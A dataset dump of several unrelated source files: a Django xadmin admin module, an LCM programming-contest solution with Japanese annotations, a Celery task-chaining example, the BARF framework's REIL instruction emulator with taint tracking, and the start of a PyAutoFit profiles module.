editandcheck.confirm_ele_find = all_list_1[i][11] # 填写确定按钮查找风格
editandcheck.confirm_ele_find_value = all_list_1[i][12] # 填写确定按钮查找风格的确切值
editandcheck.click_confirm_delay_time = all_list_1[i][13] # 填写点击确定按钮后的延时时长(单位秒)
editandcheck.is_click_cancel = all_list_1[i][14] # 填写是否点击取消按钮
editandcheck.cancel_ele_find = all_list_1[i][15] # 填写取消按钮查找风格
editandcheck.cancel_ele_find_value = all_list_1[i][16] # 填写取消按钮查找风格的确切值
editandcheck.is_submit_success = all_list_1[i][17] # 填写是否添加成功
editandcheck.is_signel_page = all_list_1[i][18] # 填写是否单页面
editandcheck.page_number_xpath = all_list_1[i][19] # 填写页数层xpath路径值
editandcheck.result_table_ele_find = all_list_1[i][20] # 填写结果表格查找风格
editandcheck.result_table_ele_find_value = all_list_1[i][21] # 填写结果表格查找风格的确切值
editandcheck.table_colnum_counts = all_list_1[i][22] # 填写结果表格总列数
editandcheck.case_counts = all_list_1[i][23] # 填写case_counts
if all_list_1[i][24] != None: # 如果编写人列有数据则填写编写人
users = User.objects.all()
for user in users:
if user.username == all_list_1[i][24]:
editandcheck.write_user_id = user.id # 填写编写人
editandcheck.save() # 保存到数据库
i = i + 1
pass
return super(EditAndCheckXadmin,self).post(request,*args,**kwargs) # 必须调用clickandbackAdmin父类,再调用post方法,否则会报错
# 一定不要忘记,否则整个ClickAndBackXAdmin保存都会出错
xadmin.site.register(LoginAndCheck,LoginAndCheckXadmin) #在xadmin中注册LoginAndCheckXAdmin
xadmin.site.register(ClickAndBack, ClickAndBackXAdmin) #在xadmin中注册ClickAndBackXAdmin
xadmin.site.register(NewAddAndCheck,NewAddAndCheckXadmin) #在xadmin中注册NewAddAndCheckXadmin
xadmin.site.register(SearchAndCheck,SearchAndCheckXadmin) #在xadmin中注册SearchAndCheckXadmin
xadmin.site.register(DeleteAndCheck,DeleteAndCheckXadmin) #在xadmin中注册DeleteAndCheckXadmin
xadmin.site.register(EditAndCheck,EditAndCheckXadmin) #在xadmin中注册DeleteAndCheckXadmin
| [
"wawj900805"
] | wawj900805 |
61c120b8fd81352b68514fa25a7440b9e07c6d13 | 7807d8d9d109a3e272fffed91bf841201da39256 | /trans_NTL_1_C/aaa119_NTL_1_C_kotonoha.py | b982f55f4bfddd7e6698b1ac8f94bef517d3ba62 | [] | no_license | y-akinobu/AOJ_to_Kotonoha | 0e8df43393964fcdd5df06c75545091bd6c0c2e2 | 5a694a55a3d85e3fbc4a07b57edc4374556db9a1 | refs/heads/main | 2023-02-05T15:33:16.581177 | 2020-12-30T16:14:44 | 2020-12-30T16:14:44 | 325,524,216 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | [#Document [# 'coding: utf-8']][#Document [# '76']]
# fractionsモジュールを用いる
import fractions
# 入力された文字列の整数値をnとする
n = int(input())
# 'map(整数,{{入力された文字列を空白で分割した列}})のリストをaとする
a = list(map(int,input().split()))
# aの最初値をansとする
ans = a[0]
# '1からn未満までの数列の各要素を順にiとして、繰り返す
for i in range(1,n) :
# ansにa(i)を掛けた値をfractions.gcd(ans,a[i])で割った商をansとする
ans = ans*a[i] // fractions.gcd(ans,a[i])
# ansを出力する
print(ans) | [
"[email protected]"
] | |
8f8f3812524da3845410fcca49e1304a214732b9 | 33421188df7d7dcf2ee9be0771b0f2fe1ffad4f5 | /2014/Codemotion/celery/examples/canvas/tasks.py | 852cca47ec68a4b448671ea1b3a13cf41af94abc | [
"CC-BY-4.0"
] | permissive | Gustavo17/ponencias | c0482fc7a72d7d4d829a54b94775e77c81ca5d97 | effb002b0300fe57d26776654b61a2396010da40 | refs/heads/master | 2021-01-13T09:18:13.837313 | 2014-11-21T04:58:11 | 2014-11-21T04:58:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | from celery import Celery, group, chain, chord
import time
app = Celery('tasks', backend='amqp', broker='amqp://guest@localhost//')
@app.task
def fetch_url(url):
return "CONTENT DATA"
@app.task
def lowcase(content):
return content.lower()
@app.task
def split(content):
return content.split()
@app.task
def flat(data):
return [item for sublist in data for item in sublist]
@app.task
def sleeper(data):
time.sleep(1)
return data
@app.task
def join(data):
return "#".join(data)
if __name__ == "__main__":
res = chord([chain(fetch_url.s(url), lowcase.s(), split.s()) for url in ["www.google.com", "www.facebook.com"]], flat.s() | sleeper.s() | join.s())()
print(res.get())
| [
"[email protected]"
] | |
66e9fcb90504ec32f0a70a93da82359f2ac7ebb4 | a96033c99f6dc8994c09928153d51ac249f4d4ff | /barf/barf/core/reil/reilemulator.py | 178284edce38528fd8192a5d317b0ac2ec660f9a | [
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ignaeche/barf-project | 0a1d8c77086fb7fc13d3b8282aac63dc84f58b85 | 075782045f52924fbb1312140b4c525f75e85e82 | refs/heads/master | 2021-01-15T09:19:01.103284 | 2015-09-22T18:08:12 | 2015-09-22T18:08:12 | 43,160,150 | 0 | 0 | null | 2015-09-25T16:29:18 | 2015-09-25T16:29:18 | null | UTF-8 | Python | false | false | 35,549 | py | # Copyright (c) 2014, Fundacion Dr. Manuel Sadosky
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This module contains all the necesary classes to emulate REIL
instructions. So far, it only handles concrete values.
The emulator is compose of two main classes. The emulator itself,
**ReilEmulator** and a memory component **ReilMemory**.
ReilEmulator
------------
It has two main methods, e.i., **emulate** and **emulate_lite**. The
first, emulates REIL instructions completely and takes as parameters a
list of instruction and a start address (REIL address). The second, is a
more performing emulation where the list of instruction is execute from
beginning to end not considering branches.
ReilMemory
----------
Byte addressable memory based on a dictionary.
"""
import logging
import random
from barf.core.reil.reil import ReilImmediateOperand
from barf.core.reil.reil import ReilMnemonic
from barf.core.reil.reil import ReilRegisterOperand
from barf.core.reil.reil import ReilContainerInvalidAddressError
from barf.utils.utils import extract_sign_bit
from barf.utils.utils import extract_value
from barf.utils.utils import insert_value
from barf.utils.utils import twos_complement
logger = logging.getLogger("reilemulator")
DEBUG = False
# DEBUG = True
REIL_MEMORY_ENDIANNESS_LE = 0x0 # Little Endian
REIL_MEMORY_ENDIANNESS_BE = 0x1 # Big Endian
class ReilMemory(object):
"""A REIL memory model (byte addressable).
"""
def __init__(self, address_size):
# TODO: Set endianness through a parameter.
# TODO: Check that all addresses have size address_size.
# TODO: Use endianness parameter.
# Memory's address size.
self.__address_size = address_size
# Memory's endianness.
self.__endianness = REIL_MEMORY_ENDIANNESS_LE
# Dictionary that implements the memory itself.
self._memory = {}
# Read methods
# ======================================================================== #
def read(self, address, size):
"""Read arbitrary size content from memory.
"""
value = 0x0
for i in xrange(0, size):
value = self._read_byte(address + i) << (i * 8) | value
return value
def _read_byte(self, address):
"""Read a byte from memory.
"""
# Initialize memory location with a random value.
if not address in self._memory:
self._memory[address] = random.randint(0x00, 0xff)
return self._memory[address]
# Write methods
# ======================================================================== #
def write(self, address, size, value):
"""Write arbitrary size content to memory.
"""
for i in xrange(0, size):
self.__write_byte(address + i, (value >> (i * 8)) & 0xff)
def __write_byte(self, address, value):
"""Write byte in memory.
"""
self._memory[address] = value & 0xff
# Misc methods
# ======================================================================== #
def reset(self):
# Dictionary that implements the memory itself.
self._memory = {}
# Magic methods
# ======================================================================== #
def __str__(self):
lines = []
for addr in sorted(self._memory.keys()):
lines += ["0x%08x : 0x%08x" % (addr, self._memory[addr])]
return "\n".join(lines)
class ReilMemoryEx(ReilMemory):
"""Reil memory extended class"""
def __init__(self, address_size):
super(ReilMemoryEx, self).__init__(address_size)
# Previous state of memory.
self.__memory_prev = {}
# Write operations counter.
self.__write_count = 0
# Read methods
# ======================================================================== #
def read_inverse(self, value, size):
"""Return a list of memory addresses that contain the specified
value.
"""
addr_candidates = [addr for addr, val in self._memory.items()
if val == (value & 0xff)]
addr_matchings = []
for addr in addr_candidates:
match = True
for i in xrange(0, size):
byte_curr = (value >> (i * 8)) & 0xff
try:
match = self._memory[addr + i] == byte_curr
except KeyError:
match = False
if not match:
break
if match:
addr_matchings += [addr]
return addr_matchings
def try_read(self, address, size):
"""Try to read memory content at specified address.
If any location was not written before, it returns a tuple
(False, None). Otherwise, it returns (True, memory content).
"""
value = 0x0
for i in xrange(0, size):
addr = address + i
if addr in self._memory:
value = self._read_byte(addr) << (i * 8) | value
else:
return False, None
return True, value
def try_read_prev(self, address, size):
"""Try to read previous memory content at specified address.
If any location was not written before, it returns a tuple
(False, None). Otherwise, it returns (True, memory content).
"""
value = 0x0
for i in xrange(0, size):
addr = address + i
if addr in self.__memory_prev:
_, val_byte = self.__try_read_byte_prev(addr)
value = val_byte << (i * 8) | value
else:
return False, None
return True, value
def __try_read_byte_prev(self, address):
"""Read previous value for memory location.
Return a tuple (True, Byte) in case of successful read,
(False, None) otherwise.
"""
# Initialize memory location with a random value
if not address in self.__memory_prev:
return False, None
return True, self.__memory_prev[address]
# Write methods
# ======================================================================== #
def write(self, address, size, value):
"""Write arbitrary size content to memory.
"""
for i in xrange(0, size):
self.__write_byte(address + i, (value >> (i * 8)) & 0xff)
self.__write_count += 1
def __write_byte(self, address, value):
"""Write byte in memory.
"""
# Save previous address content.
if address in self._memory:
self.__memory_prev[address] = self._memory[address]
self._memory[address] = value & 0xff
# Misc methods
# ======================================================================== #
def reset(self):
super(ReilMemoryEx, self).reset()
# Previous state of memory.
self.__memory_prev = {}
# Write operations counter.
self.__write_count = 0
def get_addresses(self):
"""Get accessed addresses.
"""
return self._memory.keys()
def get_write_count(self):
"""Get number of write operations performed on the memory.
"""
return self.__write_count
class ReilCpuZeroDivisionError(Exception):
pass
class ReilCpuInvalidAddressError(Exception):
pass
class ReilCpuInvalidInstruction(Exception):
pass
class ReilCpu(object):
def __init__(self, arch, memory, tainter, emulator):
# Architecture information.
self.__arch = arch
# Reil emulator instance.
self.__emu = emulator
# Reil memory instance.
self.__mem = memory
# Reil tainter instance.
self.__tainter = tainter
# Registers.
self.__regs = dict()
self.__regs_written = set()
self.__regs_read = set()
# Instructions pre and post handlers.
self.__instr_handler_pre = None, None
self.__instr_handler_post = None, None
# Instruction implementation.
self.__executors = {
# Arithmetic Instructions
ReilMnemonic.ADD : self.__execute_binary_op,
ReilMnemonic.SUB : self.__execute_binary_op,
ReilMnemonic.MUL : self.__execute_binary_op,
ReilMnemonic.DIV : self.__execute_binary_op,
ReilMnemonic.SDIV : self.__execute_binary_op,
ReilMnemonic.MOD : self.__execute_binary_op,
ReilMnemonic.SMOD : self.__execute_binary_op,
ReilMnemonic.BSH : self.__execute_bsh,
# Bitwise Instructions
ReilMnemonic.AND : self.__execute_binary_op,
ReilMnemonic.OR : self.__execute_binary_op,
ReilMnemonic.XOR : self.__execute_binary_op,
# Data Transfer Instructions
ReilMnemonic.LDM : self.__execute_ldm,
ReilMnemonic.STM : self.__execute_stm,
ReilMnemonic.STR : self.__execute_str,
# Conditional Instructions
ReilMnemonic.BISZ : self.__execute_bisz,
ReilMnemonic.JCC : self.__execute_jcc,
# Other Instructions
ReilMnemonic.UNDEF : self.__execute_undef,
ReilMnemonic.UNKN : self.__execute_unkn,
ReilMnemonic.NOP : self.__execute_skip,
# Ad hoc Instructions
ReilMnemonic.RET : self.__execute_skip,
# Extensions
ReilMnemonic.SEXT : self.__execute_sext,
}
self.__set_default_handlers()
def execute(self, instr):
if DEBUG:
print("0x%08x:%02x : %s" % (instr.address >> 8,
instr.address & 0xff,
instr))
# Execute pre instruction handlers
handler_fn_pre, handler_param_pre = self.__instr_handler_pre
handler_fn_pre(self.__emu, instr, handler_param_pre)
# Execute instruction
next_addr = self.__executors[instr.mnemonic](instr)
# Taint instruction
self.__tainter.taint(instr)
# Execute post instruction handlers
handler_fn_post, handler_param_post = self.__instr_handler_post
handler_fn_post(self.__emu, instr, handler_param_post)
return next_addr
def reset(self):
# Registers.
self.__regs = dict()
self.__regs_written = set()
self.__regs_read = set()
# Instructions pre and post handlers.
self.__instr_handler_pre = None, None
self.__instr_handler_post = None, None
self.__set_default_handlers()
# Properties
# ======================================================================== #
@property
def registers(self):
return self.__regs
@registers.setter
def registers(self, value):
self.__regs = value
@property
def read_registers(self):
return self.__regs_read
@property
def written_registers(self):
return self.__regs_written
# Instruction's handler methods
# ======================================================================== #
def set_instruction_pre_handler(self, function, parameter):
self.__instr_handler_pre = (function, parameter)
def set_instruction_post_handler(self, function, parameter):
self.__instr_handler_post = (function, parameter)
# Instruction's handler auxiliary methods
# ======================================================================== #
def __set_default_handlers(self):
empty_fn, empty_param = lambda emu, instr, param: None, None
self.__instr_handler_pre = (empty_fn, empty_param)
self.__instr_handler_post = (empty_fn, empty_param)
# Read/Write methods
# ======================================================================== #
def read_operand(self, operand):
if isinstance(operand, ReilRegisterOperand):
value = self.__read_register(operand)
elif isinstance(operand, ReilImmediateOperand):
value = operand.immediate
else:
raise Exception("Invalid operand type : %s" % str(operand))
return value
def write_operand(self, operand, value):
if isinstance(operand, ReilRegisterOperand):
self.__write_register(operand, value)
else:
raise Exception("Invalid operand type : %s" % str(operand))
def read_memory(self, address, size):
value = self.__mem.read(address, size)
if DEBUG:
self.__debug_read_memory(address, size, value)
return value
def write_memory(self, address, size, value):
self.__mem.write(address, size, value)
if DEBUG:
self.__debug_write_memory(address, size, value)
# Read/Write auxiliary methods
# ======================================================================== #
def __get_register_info(self, register):
if register.name in self.__arch.alias_mapper:
base_register, offset = self.__arch.alias_mapper[register.name]
base_size = self.__arch.registers_size[base_register]
else:
base_register, offset = register.name, 0
base_size = register.size
return base_register, base_size, offset
def __get_register_value(self, register):
base_register, base_size, offset = self.__get_register_info(register)
if base_register not in self.__regs:
self.__regs[base_register] = random.randint(0, 2**base_size - 1)
base_value = self.__regs[base_register]
return base_register, base_value, offset
def __read_register(self, register):
base_register, base_value, offset = self.__get_register_value(register)
value = extract_value(base_value, offset, register.size)
# Keep track of native register reads.
if register.name in self.__arch.registers_gp_all:
self.__regs_read.add(register.name)
if DEBUG:
self.__debug_read_operand(base_register, register.name, value)
return value
def __write_register(self, register, value):
base_register, base_value, offset = self.__get_register_value(register)
base_value_new = insert_value(base_value, value, offset, register.size)
self.__regs[base_register] = base_value_new
# Keep track of native register writes.
if register.name in self.__arch.registers_gp_all:
self.__regs_written.add(register.name)
if DEBUG:
self.__debug_write_operand(base_register, register.name, value)
# Debug methods
# ======================================================================== #
def __debug_read_operand(self, base_register, register, value):
base_value = self.__regs[base_register]
taint = "T" if self.__tainter.get_register_taint(register) else "-"
params = {
"indent" : " "*10,
"register" : register,
"value" : value,
"base_register" : base_register,
"base_value" : base_value,
"taint" : taint
}
fmt = "{indent}r{{ {register:s} = {value:08x} [{taint:s}] " + \
"({base_register:s} = {base_value:08x})}}"
print(fmt.format(**params))
def __debug_write_operand(self, base_register, register, value):
base_value = self.__regs[base_register]
taint = "T" if self.__tainter.get_register_taint(register) else "-"
params = {
"indent" : " "*10,
"register" : register,
"value" : value,
"base_register" : base_register,
"base_value" : base_value,
"taint" : taint
}
fmt = "{indent}w{{ {register:s} = {value:08x} [{taint:s}] " + \
"({base_register:s} = {base_value:08x})}}"
print(fmt.format(**params))
def __debug_read_memory(self, address, size, value):
taint = "T" if self.__tainter.get_memory_taint(address, size) else "-"
params = {
"indent" : " "*10,
"address" : address,
"value" : value,
"taint" : taint
}
fmt = "{indent}r{{ m[{address:08x}] = {value:08x} [{taint:s}]}}"
print(fmt.format(**params))
def __debug_write_memory(self, address, size, value):
taint = "T" if self.__tainter.get_memory_taint(address, size) else "-"
params = {
"indent" : " "*10,
"address" : address,
"value" : value,
"taint" : taint
}
fmt = "{indent}w{{ m[{address:08x}] = {value:08x} [{taint:s}]}}"
print(fmt.format(**params))
# ======================================================================== #
# REIL instructions implementation
# ======================================================================== #
# Arithmetic instructions
# ======================================================================== #
def __execute_bsh(self, instr):
"""Execute BSH instruction.
"""
op0_val = self.read_operand(instr.operands[0])
op1_val = self.read_operand(instr.operands[1])
op1_size = instr.operands[1].size
# Check sign bit.
if extract_sign_bit(op1_val, op1_size) == 0:
op2_val = op0_val << op1_val
else:
op2_val = op0_val >> twos_complement(op1_val, op1_size)
self.write_operand(instr.operands[2], op2_val)
return None
# Bitwise instructions
# ======================================================================== #
def __signed_div(self, oprnd0, oprnd1, result_size):
op0_val = self.read_operand(oprnd0)
op1_val = self.read_operand(oprnd1)
op0_sign = op0_val >> oprnd0.size-1
op1_sign = op1_val >> oprnd1.size-1
result_sign = op0_sign ^ op1_sign
print(oprnd0.size, oprnd1.size, hex)
if op0_sign == 0x1:
op0_tmp = twos_complement(op0_val, oprnd0.size)
else:
op0_tmp = op0_val
if op1_sign == 0x1:
op1_tmp = twos_complement(op1_val, oprnd1.size)
else:
op1_tmp = op1_val
result_tmp = op0_tmp / op1_tmp
if result_sign == 0x1:
result = twos_complement(result_tmp, result_size)
else:
result = result_tmp
print(hex(op0_val), hex(op0_tmp), hex(op1_val), hex(op1_tmp), hex(result_sign), hex(result_tmp), hex(result))
return result & (2**result_size-1)
def __signed_mod(self, oprnd0, oprnd1, result_size):
op0_val = self.read_operand(oprnd0)
op1_val = self.read_operand(oprnd1)
quotient = self.__signed_div(oprnd0, oprnd1, result_size)
remainder = op0_val - (op1_val * quotient)
return remainder & (2**result_size-1)
def __execute_binary_op(self, instr):
op_map = {
ReilMnemonic.ADD : lambda a, b: a + b,
ReilMnemonic.SUB : lambda a, b: a - b,
ReilMnemonic.MUL : lambda a, b: a * b, # unsigned multiplication
ReilMnemonic.DIV : lambda a, b: a / b, # unsigned division
ReilMnemonic.MOD : lambda a, b: a % b, # unsigned modulo
ReilMnemonic.AND : lambda a, b: a & b,
ReilMnemonic.OR : lambda a, b: a | b,
ReilMnemonic.XOR : lambda a, b: a ^ b,
}
op0_val = self.read_operand(instr.operands[0])
op1_val = self.read_operand(instr.operands[1])
if instr.mnemonic in [ReilMnemonic.DIV, ReilMnemonic.MOD] and \
op1_val == 0:
raise ReilCpuZeroDivisionError()
if instr.mnemonic in [ReilMnemonic.SDIV]:
op2_val = self.__signed_div(instr.operands[0], instr.operands[1], instr.operands[2].size)
elif instr.mnemonic in [ReilMnemonic.SMOD]:
op2_val = self.__signed_mod(instr.operands[0], instr.operands[1], instr.operands[2].size)
else:
op2_val = op_map[instr.mnemonic](op0_val, op1_val)
self.write_operand(instr.operands[2], op2_val)
# Data transfer instructions
# ======================================================================== #
def __execute_ldm(self, instr):
"""Execute LDM instruction.
"""
assert instr.operands[0].size == self.__arch.address_size
assert instr.operands[2].size in [8, 16, 32, 64]
# Memory address.
op0_val = self.read_operand(instr.operands[0])
# Data.
op2_val = self.read_memory(op0_val, instr.operands[2].size / 8)
self.write_operand(instr.operands[2], op2_val)
return None
def __execute_stm(self, instr):
"""Execute STM instruction.
"""
assert instr.operands[0].size in [8, 16, 32, 64]
assert instr.operands[2].size == self.__arch.address_size
op0_val = self.read_operand(instr.operands[0]) # Data.
op2_val = self.read_operand(instr.operands[2]) # Memory address.
op0_size = instr.operands[0].size
self.write_memory(op2_val, op0_size / 8, op0_val)
return None
def __execute_str(self, instr):
"""Execute STR instruction.
"""
op0_val = self.read_operand(instr.operands[0])
self.write_operand(instr.operands[2], op0_val)
return None
# Conditional instructions
# ======================================================================== #
def __execute_bisz(self, instr):
"""Execute BISZ instruction.
"""
op0_val = self.read_operand(instr.operands[0])
op2_val = 1 if op0_val == 0 else 0
self.write_operand(instr.operands[2], op2_val)
return None
def __execute_jcc(self, instr):
"""Execute JCC instruction.
"""
op0_val = self.read_operand(instr.operands[0]) # Branch condition.
op2_val = self.read_operand(instr.operands[2]) # Target address.
return op2_val if op0_val != 0 else None
# Other instructions
# ======================================================================== #
def __execute_undef(self, instr):
"""Execute UNDEF instruction.
"""
op2_val = random.randint(0, instr.operands[2].size)
self.write_operand(instr.operands[2], op2_val)
return None
def __execute_unkn(self, instr):
"""Execute UNKN instruction.
"""
raise ReilCpuInvalidInstruction()
def __execute_skip(self, instr):
"""Skip instruction.
"""
return None
# REIL extension instructions
# ======================================================================== #
def __execute_sext(self, instr):
"""Execute SEXT instruction.
"""
op0_size = instr.operands[0].size
op2_size = instr.operands[2].size
op0_val = self.read_operand(instr.operands[0])
op0_msb = extract_sign_bit(op0_val, op0_size)
op2_mask = (2**op2_size-1) & ~(2**op0_size-1) if op0_msb == 1 else 0x0
op2_val = op0_val | op2_mask
self.write_operand(instr.operands[2], op2_val)
return None
class ReilEmulatorTainter(object):
def __init__(self, arch, emulator):
# Architecture information.
self.__arch = arch
# Reil emulator instance.
self.__emu = emulator
# Taint information.
self.__taint_reg = {} # Register-level tainting
self.__taint_mem = {} # Byte-level tainting
# Taint function lookup table.
self.__tainter = {
# Arithmetic Instructions
ReilMnemonic.ADD : self.__taint_binary_op,
ReilMnemonic.SUB : self.__taint_binary_op,
ReilMnemonic.MUL : self.__taint_binary_op,
ReilMnemonic.DIV : self.__taint_binary_op,
ReilMnemonic.SDIV : self.__taint_binary_op,
ReilMnemonic.MOD : self.__taint_binary_op,
ReilMnemonic.SMOD : self.__taint_binary_op,
ReilMnemonic.BSH : self.__taint_binary_op,
# Bitwise Instructions
ReilMnemonic.AND : self.__taint_binary_op,
ReilMnemonic.OR : self.__taint_binary_op,
ReilMnemonic.XOR : self.__taint_binary_op,
# Data Transfer Instructions
ReilMnemonic.LDM : self.__taint_load,
ReilMnemonic.STM : self.__taint_store,
ReilMnemonic.STR : self.__taint_move,
# Conditional Instructions
ReilMnemonic.BISZ : self.__taint_move,
ReilMnemonic.JCC : self.__taint_nothing,
# Other Instructions
ReilMnemonic.UNDEF : self.__taint_undef,
ReilMnemonic.UNKN : self.__taint_nothing,
ReilMnemonic.NOP : self.__taint_nothing,
# Ad hoc Instructions
ReilMnemonic.RET : self.__taint_nothing,
# Extensions
ReilMnemonic.SEXT : self.__taint_move,
}
def taint(self, instruction):
self.__tainter[instruction.mnemonic](instruction)
def reset(self):
# Taint information.
self.__taint_reg = {}
self.__taint_mem = {}
# Operand taint methods
# ======================================================================== #
def get_operand_taint(self, operand):
if isinstance(operand, ReilRegisterOperand):
taint = self.get_register_taint(operand.name)
elif isinstance(operand, ReilImmediateOperand):
taint = False
else:
raise Exception("Invalid operand: %s" % str(operand))
return taint
def set_operand_taint(self, operand, taint):
if isinstance(operand, ReilRegisterOperand):
self.set_register_taint(operand.name, taint)
else:
raise Exception("Invalid operand: %s" % str(operand))
def clear_operand_taint(self, operand):
if isinstance(operand, ReilRegisterOperand):
self.clear_register_taint(operand)
else:
raise Exception("Invalid operand: %s" % str(operand))
# Memory taint methods
# ======================================================================== #
def get_memory_taint(self, address, size):
tainted = False
for i in xrange(0, size):
tainted = tainted or self.__taint_mem.get(address + i, False)
return tainted
def set_memory_taint(self, address, size, taint):
for i in xrange(0, size):
self.__taint_mem[address + i] = taint
def clear_memory_taint(self, address, size):
for i in xrange(0, size):
self.__taint_mem[address + i] = False
# Register taint methods
# ======================================================================== #
def get_register_taint(self, register):
return self.__taint_reg.get(self.__get_base_register(register), False)
def set_register_taint(self, register, taint):
self.__taint_reg[self.__get_base_register(register)] = taint
def clear_register_taint(self, register):
self.__taint_reg[self.__get_base_register(register)] = False
# Taint auxiliary methods
# ======================================================================== #
def __get_base_register(self, register):
if register in self.__arch.alias_mapper and \
register not in self.__arch.registers_flags:
# NOTE: Flags are tainted individually.
base_name, _ = self.__arch.alias_mapper[register]
else:
base_name = register
return base_name
# Taint methods
# ======================================================================== #
def __taint_binary_op(self, instr):
# Get taint information.
op0_taint = self.get_operand_taint(instr.operands[0])
op1_taint = self.get_operand_taint(instr.operands[1])
# Propagate taint.
self.set_operand_taint(instr.operands[2], op0_taint or op1_taint)
def __taint_load(self, instr):
"""Taint LDM instruction.
"""
# Get memory address.
op0_val = self.__emu.read_operand(instr.operands[0])
# Get taint information.
op0_taint = self.get_memory_taint(op0_val, instr.operands[2].size / 8)
# Propagate taint.
self.set_operand_taint(instr.operands[2], op0_taint)
def __taint_store(self, instr):
"""Taint STM instruction.
"""
# Get memory address.
op2_val = self.__emu.read_operand(instr.operands[2])
# Get taint information.
op0_size = instr.operands[0].size
op0_taint = self.get_operand_taint(instr.operands[0])
# Propagate taint.
self.set_memory_taint(op2_val, op0_size / 8, op0_taint)
def __taint_move(self, instr):
"""Taint registers move instruction.
"""
# Get taint information.
op0_taint = self.get_operand_taint(instr.operands[0])
# Propagate taint.
self.set_operand_taint(instr.operands[2], op0_taint)
def __taint_undef(self, instr):
"""Taint UNDEF instruction.
"""
# Propagate taint.
self.set_operand_taint(instr.operands[2], False)
def __taint_nothing(self, instr):
"""Taint nothing.
"""
pass
class ReilEmulator(object):
"""Reil Emulator."""
def __init__(self, arch, cpu=None, memory=None):
# Architecture information.
self.__arch = arch
# An instance of a ReilTainter.
self.__tainter = ReilEmulatorTainter(self.__arch, self)
# An instance of a ReilMemory.
self.__mem = memory if memory else ReilMemoryEx(self.__arch.address_size)
# An instance of a ReilCpu.
self.__cpu = cpu if cpu else ReilCpu(self.__arch, self.__mem, self.__tainter, self)
# Execution methods
# ======================================================================== #
def execute(self, container, start=None, end=None, registers=None):
"""Execute instructions.
"""
if registers:
self.__cpu.registers = dict(registers)
ip = start if start else container[0].address
while ip and ip != end:
try:
instr = container.fetch(ip)
except ReilContainerInvalidAddressError:
raise ReilCpuInvalidAddressError()
next_ip = self.__cpu.execute(instr)
ip = next_ip if next_ip else container.get_next_address(ip)
return dict(self.__cpu.registers), self.__mem
def execute_lite(self, instructions, context=None):
"""Execute a list of instructions. It does not support loops.
"""
if context:
self.__cpu.registers = dict(context)
for instr in instructions:
self.__cpu.execute(instr)
return dict(self.__cpu.registers), self.__mem
# Reset methods
# ======================================================================== #
def reset(self):
"""Reset emulator. All registers and memory are reset.
"""
self.__mem.reset()
self.__cpu.reset()
self.__tainter.reset()
def reset_memory(self):
self.__mem.reset()
def reset_cpu(self):
self.__cpu.reset()
def reset_tainter(self):
self.__tainter.reset()
# Handler methods
# ======================================================================== #
def set_instruction_pre_handler(self, function, parameter):
self.__cpu.set_instruction_pre_handler(function, parameter)
def set_instruction_post_handler(self, function, parameter):
self.__cpu.set_instruction_post_handler(function, parameter)
# Read/Write methods
# ======================================================================== #
def read_operand(self, operand):
return self.__cpu.read_operand(operand)
def write_operand(self, operand, value):
self.__cpu.write_operand(operand, value)
def read_memory(self, address, size):
return self.__mem.read(address, size)
def write_memory(self, address, size, value):
self.__mem.write(address, size, value)
# Taint methods
# ======================================================================== #
def get_operand_taint(self, register):
return self.__tainter.get_operand_taint(register)
def set_operand_taint(self, register, value):
self.__tainter.set_operand_taint(register, value)
def clear_operand_taint(self, register):
self.__tainter.clear_operand_taint(register)
def get_register_taint(self, register):
return self.__tainter.get_register_taint(register)
def set_register_taint(self, register, value):
self.__tainter.set_register_taint(register, value)
def clear_register_taint(self, register):
self.__tainter.clear_register_taint(register)
def get_memory_taint(self, address, size):
return self.__tainter.get_memory_taint(address, size)
def set_memory_taint(self, address, size, value):
self.__tainter.set_memory_taint(address, size, value)
def clear_memory_taint(self, address, size):
self.__tainter.clear_memory_taint(address, size)
# Properties
# ======================================================================== #
@property
def registers(self):
"""Return registers.
"""
return self.__cpu.registers
@registers.setter
def registers(self, value):
"""Return registers.
"""
self.__cpu.registers = value
@property
def memory(self):
"""Return memory.
"""
return self.__mem
@property
def cpu(self):
"""Return memory.
"""
return self.__cpu
@property
def read_registers(self):
"""Return read (native) registers.
"""
return self.__cpu.read_registers
@property
def written_registers(self):
"""Return written (native) registers.
"""
return self.__cpu.written_registers
| [
"[email protected]"
] | |
be8a44a141a5d792643c73427964c8088de152e4 | 448756d7ff6c9cbdf0a8b3b4ff8309207a6bb504 | /scripts/howtofit/chapter_database/profiles.py | 7621d81f9dc7090851b2ab1977513de4f4476fbc | [] | no_license | jonathanfrawley/autofit_workspace_copy | f84c8ed8d8106cbd0735601b54d35104976219cf | 4631ac452f62cd9c3d5257b4d0b2a64630c51ecf | refs/heads/master | 2023-04-21T04:06:20.140963 | 2021-05-13T16:02:59 | 2021-05-13T16:02:59 | 367,427,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,552 | py | import numpy as np
"""
In tutorial 5, we perform modeling using multiple profiles, in particular the `Gaussian` profile from the previous
tutorials and an Exponential profile. In analysis.py, we will edit how model-data is generated from profiles such
that it is the sum of all profiles in our model.
In this module, we thus now have two classes following the PyAutoFit model component format. We have renamed the
